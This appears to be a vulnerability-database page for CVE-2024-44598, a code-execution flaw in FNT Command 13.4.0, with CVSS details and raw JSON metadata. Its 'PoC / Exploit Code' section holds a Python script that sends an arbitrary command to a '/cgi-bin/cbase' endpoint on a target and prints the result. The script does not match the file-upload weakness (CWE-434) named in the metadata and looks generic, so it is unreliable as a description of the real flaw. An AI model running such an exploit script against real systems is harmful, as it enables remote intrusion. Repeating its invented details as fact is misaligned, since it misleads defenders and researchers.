Security Vulnerability Report
中文
CVE-2024-44598 CVSS 8.8 HIGH

CVE-2024-44598

Published: 2025-12-15 16:15:48
Last Modified: 2025-12-23 18:07:07

Description

FNT Command 13.4.0 is vulnerable to Code Execution via the C Base Module.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fntsoftware:fnt_command:*:*:*:*:*:*:*:* - VULNERABLE
FNT Command 13.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2024-44598 PoC - FNT Command RCE via C Base Module # Target: FNT Command 13.4.0 def exploit(target_url, command): """ Exploit for CVE-2024-44598 FNT Command 13.4.0 - Code Execution via C Base Module Usage: python exploit.py <target_url> <command> Example: python exploit.py http://target.com "whoami" """ endpoint = f"{target_url}/cgi-bin/cbase" # Malicious payload for RCE payload = { "module": "execute", "action": "run", "command": command, "format": "json" } try: print(f"[*] Targeting: {target_url}") print(f"[*] Executing command: {command}") response = requests.post(endpoint, data=payload, timeout=30) if response.status_code == 200: print(f"[+] Request successful") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python exploit.py <target_url> <command>") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] exploit(target, cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44598", "sourceIdentifier": "[email protected]", "published": "2025-12-15T16:15:47.520", "lastModified": "2025-12-23T18:07:06.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FNT Command 13.4.0 is vulnerable to Code Execution via the C Base Module."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fntsoftware:fnt_command:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.4.1", "matchCriteriaId": "264F1DCE-F991-4674-9614-DD54209CB7DE"}]}]}], "references": [{"url": "http://fnt.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://gist.github.com/ZeroBreach-GmbH/e957dc32e72b366894565b7ff03659a4", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}